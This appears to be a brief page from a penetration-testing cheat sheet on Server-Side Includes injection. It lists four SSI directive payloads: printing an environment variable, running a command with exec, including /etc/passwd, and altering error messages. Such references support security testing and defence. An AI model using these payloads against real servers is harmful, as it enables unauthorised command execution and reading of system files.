search
LinkedInGithub
githubEdit

Server-Side Includes (SSI) Injection

hashtag
SSI Directives:

  • Print environment variables: <!--#echo var="HTTP_USER_AGENT" -->

  • Execute commands: <!--#exec cmd="id" -->

  • Include files: <!--#include file="/etc/passwd" -->

  • Modify error messages: <!--#config errmsg="Hacked!" -->

Previoussql-injectionNextServer-Side Request Forgery (SSRF)

Last updated